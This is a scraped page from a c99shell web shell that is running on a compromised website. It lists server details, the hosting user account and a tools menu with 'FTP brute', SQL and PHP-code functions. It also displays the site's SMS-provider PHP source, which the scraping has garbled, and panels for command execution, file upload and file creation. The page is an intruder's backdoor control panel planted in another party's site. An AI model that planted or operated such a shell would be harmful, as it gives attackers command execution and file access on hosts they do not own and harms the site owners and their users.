smsonayla.org - c99shell

!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: LiteSpeed. PHP/7.4.33 

uname -a: Linux server704.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13
UTC 2025 x86_64
 

uid=1309(necipbey) gid=1314(necipbey) groups=1314(necipbey) 

Safe-mode: OFF (not secure)

/home/necipbey/public_html/app/Libraries/   drwxr-xr-x
Free 3473.26 GB of 4265.01 GB (81.44%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Provider.php (3.49 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace App\Libraries;

use 
App\Libraries\Onaylasms;
use 
App\Libraries\Fivesim;
use 
App\Libraries\Smsactivate;

class 
Provider
{
    public 
$provider;
    public 
$onaylasms;
    public 
$fivesim;
    public 
$smsactivate;

    public function 
__construct($provider)
    {
        
$this->provider $provider;
        
$this->onaylasms = new Onaylasms();
        
$this->fivesim = new Fivesim();
        
$this->smsactivate = new Smsactivate();
    }

    public function 
getBalance()
    {
        if (
$this->provider == 'onaylasms') {
            return 
$this->onaylasms->getBalance();
        } else if (
$this->provider == 'fivesim') {
            return 
$this->fivesim->getBalance();
        } else if (
$this->provider == 'smsactivate') {
            return 
$this->smsactivate->getBalance();
        }
    }
    public function 
getCategories()
    {
        if (
$this->provider == 'onaylasms') {
            return 
$this->onaylasms->getCategories();
        } else if (
$this->provider == 'fivesim') {
            return 
$this->fivesim->getCategories();
        } else if (
$this->provider == 'smsactivate') {
            return 
$this->smsactivate->getCategories();
        }
    }
    public function 
getServices($categoryId)
    {
        if (
$this->provider == 'onaylasms') {
            return 
$this->onaylasms->getServices($categoryId);
        } else if (
$this->provider == 'fivesim') {
            return 
$this->fivesim->getServices($categoryId);
        } else if (
$this->provider == 'smsactivate') {
            return 
$this->smsactivate->getServices($categoryId);
        }
    }
    public function 
getServiceDetails($category$serviceId)
    {
        if (
$this->provider == 'onaylasms') {
            return 
$this->onaylasms->getServiceDetails($category);
        } else if (
$this->provider == 'fivesim') {
            return 
$this->fivesim->getServiceDetails($category$serviceId);
        } else if (
$this->provider == 'smsactivate') {
            return 
$this->smsactivate->getServiceDetails($category$serviceId);
        }
    }
    public function 
getNumber($category$serviceId)
    {
        if (
$this->provider == 'onaylasms') {
            return 
$this->onaylasms->getNumber($serviceId);
        } else if (
$this->provider == 'fivesim') {
            return 
$this->fivesim->getNumber($category$serviceId);
        } else if (
$this->provider == 'smsactivate') {
            return 
$this->smsactivate->getNumber($category$serviceId);
        }
    }
    public function 
cancelNumber($numberId)
    {
        if (
$this->provider == 'onaylasms') {
            return 
$this->onaylasms->cancelNumber($numberId);
        } else if (
$this->provider == 'fivesim') {
            return 
$this->fivesim->cancelNumber($numberId);
        } else if (
$this->provider == 'smsactivate') {
            return 
$this->smsactivate->cancelNumber($numberId);
        }
    }
    public function 
getMessage($numberId)
    {
        if (
$this->provider == 'onaylasms') {
            return 
$this->onaylasms->getMessage($numberId);
        } else if (
$this->provider == 'fivesim') {
            return 
$this->fivesim->getMessage($numberId);
        } else if (
$this->provider == 'smsactivate') {
            return 
$this->smsactivate->getMessage($numberId);
        }
    }
    public function 
getDiscountRate($categoryId)
    {
        if (
$this->provider == 'onaylasms') {
            return 
$this->onaylasms->getDiscountRate($categoryId);
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0051 ]--